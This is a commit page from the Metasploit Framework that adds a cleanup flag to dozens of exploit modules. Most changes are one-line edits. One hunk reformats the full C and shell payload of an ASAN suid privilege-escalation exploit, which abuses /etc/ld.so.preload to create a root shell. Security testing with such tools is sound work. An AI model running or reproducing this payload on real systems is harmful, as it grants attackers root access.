Skip to content
Permalink
Browse files

Land #12158, needs_cleanup for on_new_session

  • Loading branch information...
wvu-r7 committed Aug 2, 2019
2 parents d9d48ff + e11de69 commit 6572fa93c4ee77651c5a6d7b17584f3e7d2f700d
Showing with 174 additions and 67 deletions.
  1. +2 −0 modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
  2. +2 −0 modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
  3. +2 −0 modules/exploits/linux/http/nagios_xi_chained_rce.rb
  4. +2 −0 modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
  5. +1 −0 modules/exploits/linux/http/webid_converter.rb
  6. +2 −0 modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
  7. +36 −34 modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
  8. +2 −0 modules/exploits/multi/http/extplorer_upload_exec.rb
  9. +2 −0 modules/exploits/multi/http/glossword_upload_exec.rb
  10. +2 −0 modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
  11. +2 −0 modules/exploits/multi/http/hyperic_hq_script_console.rb
  12. +2 −0 modules/exploits/multi/http/jenkins_script_console.rb
  13. +2 −0 modules/exploits/multi/http/kordil_edms_upload_exec.rb
  14. +2 −0 modules/exploits/multi/http/mutiny_subnetmask_exec.rb
  15. +2 −0 modules/exploits/multi/http/navigate_cms_rce.rb
  16. +3 −1 modules/exploits/multi/http/orientdb_exec.rb
  17. +2 −0 modules/exploits/multi/http/qdpm_upload_exec.rb
  18. +8 −6 modules/exploits/multi/http/struts_code_exec.rb
  19. +8 −6 modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
  20. +2 −0 modules/exploits/multi/http/struts_default_action_mapper.rb
  21. +2 −0 modules/exploits/multi/http/testlink_upload_exec.rb
  22. +6 −4 modules/exploits/multi/http/webpagetest_upload_exec.rb
  23. +2 −0 modules/exploits/multi/php/wp_duplicator_code_inject.rb
  24. +2 −0 modules/exploits/unix/dhcp/bash_environment.rb
  25. +2 −0 modules/exploits/unix/webapp/drupal_coder_exec.rb
  26. +2 −0 modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
  27. +2 −0 modules/exploits/unix/webapp/moinmoin_twikidraw.rb
  28. +8 −6 modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
  29. +6 −4 modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
  30. +2 −0 modules/exploits/unix/webapp/xoda_file_upload.rb
  31. +2 −0 modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
  32. +2 −0 modules/exploits/windows/browser/honeywell_tema_exec.rb
  33. +2 −0 modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
  34. +2 −0 modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
  35. +1 −0 modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
  36. +2 −0 modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
  37. +2 −0 modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
  38. +2 −0 modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
  39. +2 −0 modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
  40. +7 −5 modules/exploits/windows/http/cyclope_ess_sqli.rb
  41. +2 −0 modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
  42. +2 −0 modules/exploits/windows/http/oracle_btm_writetofile.rb
  43. +2 −0 modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
  44. +2 −0 modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
  45. +3 −1 modules/exploits/windows/http/umbraco_upload_aspx.rb
  46. +2 −0 modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb
  47. +2 −0 modules/exploits/windows/iis/ms01_026_dbldecode.rb
  48. +2 −0 modules/exploits/windows/iis/msadc.rb
  49. +2 −0 modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
  50. +2 −0 modules/exploits/windows/misc/altiris_ds_sqli.rb
  51. +2 −0 modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
  52. +1 −0 modules/exploits/windows/novell/file_reporter_fsfui_upload.rb
  53. +2 −0 modules/exploits/windows/novell/netiq_pum_eval.rb
  54. +2 −0 modules/exploits/windows/nuuo/nuuo_cms_fu.rb
  55. +2 −0 modules/exploits/windows/oracle/client_system_analyzer_upload.rb
@@ -83,6 +83,8 @@ def initialize(info = {})
'Stability' => [ CRASH_SERVICE_DOWN, ],
},
))

self.needs_cleanup = true
end

def p(offset)
@@ -54,6 +54,8 @@ def initialize(info={})
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
]
)

self.needs_cleanup = true
end

def execute_query(query)
@@ -38,6 +38,8 @@ def initialize(info = {})
OptInt.new('USER_ID', [true, 'User ID in the database to target', 1]),
OptString.new('API_TOKEN', [false, 'If an API token was already stolen, skip the SQLi'])
])

self.needs_cleanup = true
end

def check
@@ -49,6 +49,8 @@ def initialize(info={})
'Privileged' => false,
'DisclosureDate' => "May 17 2012",
'DefaultTarget' => 0))

self.needs_cleanup = true
end


@@ -48,6 +48,7 @@ def initialize(info = {})
], self.class
)

self.needs_cleanup = true
end

def check
@@ -68,6 +68,8 @@ def initialize(info = {})
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]

self.needs_cleanup = true
end

def base_dir
@@ -75,6 +75,8 @@ def initialize(info = {})
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]

self.needs_cleanup = true
end

def base_dir
@@ -206,50 +208,50 @@ def exploit

lib_name = ".#{rand_text_alphanumeric 5..10}"
lib_path = "#{base_dir}/#{lib_name}.so"
lib = <<-EOF
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
void init(void) __attribute__((constructor));
void __attribute__((constructor)) init() {
if (setuid(0) || setgid(0))
_exit(1);
unlink("/etc/ld.so.preload");
chown("#{@rootshell_path}", 0, 0);
chmod("#{@rootshell_path}", 04755);
_exit(0);
}
lib = <<~EOF
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
void init(void) __attribute__((constructor));
void __attribute__((constructor)) init() {
if (setuid(0) || setgid(0))
_exit(1);
unlink("/etc/ld.so.preload");
chown("#{@rootshell_path}", 0, 0);
chmod("#{@rootshell_path}", 04755);
_exit(0);
}
EOF
upload_and_compile lib_path, lib, '-fPIC -shared -ldl -Wall'

spray_name = ".#{rand_text_alphanumeric 5..10}"
spray_path = "#{base_dir}/#{spray_name}"
spray = <<-EOF
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
pid_t pid = getpid();
char buf[64];
for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {
snprintf(buf, sizeof(buf), "#{@log_prefix}.%ld", (long)pid+i);
symlink("/etc/ld.so.preload", buf);
}
}
spray = <<~EOF
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
pid_t pid = getpid();
char buf[64];
for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {
snprintf(buf, sizeof(buf), "#{@log_prefix}.%ld", (long)pid+i);
symlink("/etc/ld.so.preload", buf);
}
}
EOF
upload_and_compile spray_path, spray, '-Wall'

exp_name = ".#{rand_text_alphanumeric 5..10}"
exp_path = "#{base_dir}/#{exp_name}"
exp = <<-EOF
#!/bin/sh
#{spray_path}
ASAN_OPTIONS="disable_coredump=1 suppressions='/#{@log_prefix}
#{lib_path}
' log_path=./#{@log_prefix} verbosity=0" "#{suid_exe_path}" >/dev/null 2>&1
ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "#{suid_exe_path}" >/dev/null 2>&1
exp = <<~EOF
#!/bin/sh
#{spray_path}
ASAN_OPTIONS="disable_coredump=1 suppressions='/#{@log_prefix}
#{lib_path}
' log_path=./#{@log_prefix} verbosity=0" "#{suid_exe_path}" >/dev/null 2>&1
ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "#{suid_exe_path}" >/dev/null 2>&1
EOF
upload_and_chmodx exp_path, exp

@@ -49,6 +49,8 @@ def initialize(info={})
OptString.new('TARGETURI', [true, 'The path to the web application', '/com_extplorer_2.1.0/']),
OptString.new('USERNAME', [true, 'The username for eXtplorer', 'admin'])
])

self.needs_cleanup = true
end

def check
@@ -42,6 +42,8 @@ def initialize(info={})
OptString.new('USERNAME', [true, 'The username for Glossword', 'admin']),
OptString.new('PASSWORD', [true, 'The password for Glossword', 'admin'])
])

self.needs_cleanup = true
end

def check
@@ -65,6 +65,8 @@ def initialize(info = {})
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])
])

self.needs_cleanup = true
end

def on_new_session(client)
@@ -52,6 +52,8 @@ def initialize(info = {})
OptString.new('PASSWORD', [ true, 'The password for the application', 'hqadmin' ]),
OptString.new('TARGETURI', [ true, 'The path to HypericHQ', '/' ]),
])

self.needs_cleanup = true
end

#
@@ -61,6 +61,8 @@ def initialize(info = {})
OptString.new('API_TOKEN', [ false, 'The API token for the specified username', '' ]),
OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ])
])

self.needs_cleanup = true
end

def post_auth?
@@ -40,6 +40,8 @@ def initialize(info={})
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),
])

self.needs_cleanup = true
end

def check
@@ -73,6 +73,8 @@ def initialize(info = {})
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'mutiny' ])
])

self.needs_cleanup = true
end

def lookup_lhost()
@@ -45,6 +45,8 @@ def initialize(info = {})
register_options [
OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']),
]

self.needs_cleanup = true
end

def login_bypass
@@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

@@ -47,6 +47,8 @@ def initialize(info = {})
OptString.new('PASSWORD', [ true, 'HTTP Basic Auth Password', 'writer' ]),
OptString.new('TARGETURI', [ true, 'The path to the OrientDB application', '/' ])
])

self.needs_cleanup = true
end

def check
@@ -54,6 +54,8 @@ def initialize(info={})
OptString.new('USERNAME', [true, 'The username to login with']),
OptString.new('PASSWORD', [true, 'The password to login with'])
])

self.needs_cleanup = true
end

def check
@@ -55,12 +55,14 @@ def initialize(info = {})
'DisclosureDate' => 'Jul 13 2010',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
])
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
])

self.needs_cleanup = true
end

def execute_command(cmd, opts = {})
@@ -63,12 +63,14 @@ def initialize(info = {})
'DisclosureDate' => 'Jan 06 2012',
'DefaultTarget' => 2))

register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
])
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
])

self.needs_cleanup = true
end

def execute_command(cmd, opts = {})
@@ -73,6 +73,8 @@ def initialize(info = {})
# It isn't OptPath becuase it's a *remote* path
OptString.new("WritableDir", [ true, "A directory where we can write files (only on Linux targets)", "/tmp" ])
])

self.needs_cleanup = true
end

def on_new_session(session)
@@ -52,6 +52,8 @@ def initialize(info={})
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/testlink-1.9.3/'])
])

self.needs_cleanup = true
end

def check
@@ -46,10 +46,12 @@ def initialize(info={})
'DisclosureDate' => "Jul 13 2012",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
])
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
])

self.needs_cleanup = true
end


@@ -47,6 +47,8 @@ def initialize(info = {})
OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 40]),
])

self.needs_cleanup = true
end

def check
@@ -61,6 +61,8 @@ def initialize(info = {})
))

deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')

self.needs_cleanup = true
end

def on_new_session(session)
@@ -58,6 +58,8 @@ def initialize(info={})
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
]
)

self.needs_cleanup = true
end

def check
@@ -56,6 +56,8 @@ def initialize(info = {})
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/forums/"])
])

self.needs_cleanup = true
end

def base
@@ -62,6 +62,8 @@ def initialize(info = {})
OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ])
])

self.needs_cleanup = true
end

def post_auth?
@@ -47,12 +47,14 @@ def initialize(info = {})
'DisclosureDate' => 'Jun 23 2012'
))

register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"]),
OptString.new('USERNAME', [true, "The username to authenticate with" ]),
OptString.new('PASSWORD', [true, "The password to authenticate with" ])
])
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"]),
OptString.new('USERNAME', [true, "The username to authenticate with" ]),
OptString.new('PASSWORD', [true, "The password to authenticate with" ])
])

self.needs_cleanup = true
end


0 comments on commit 6572fa9

Please sign in to comment.
You can’t perform that action at this time.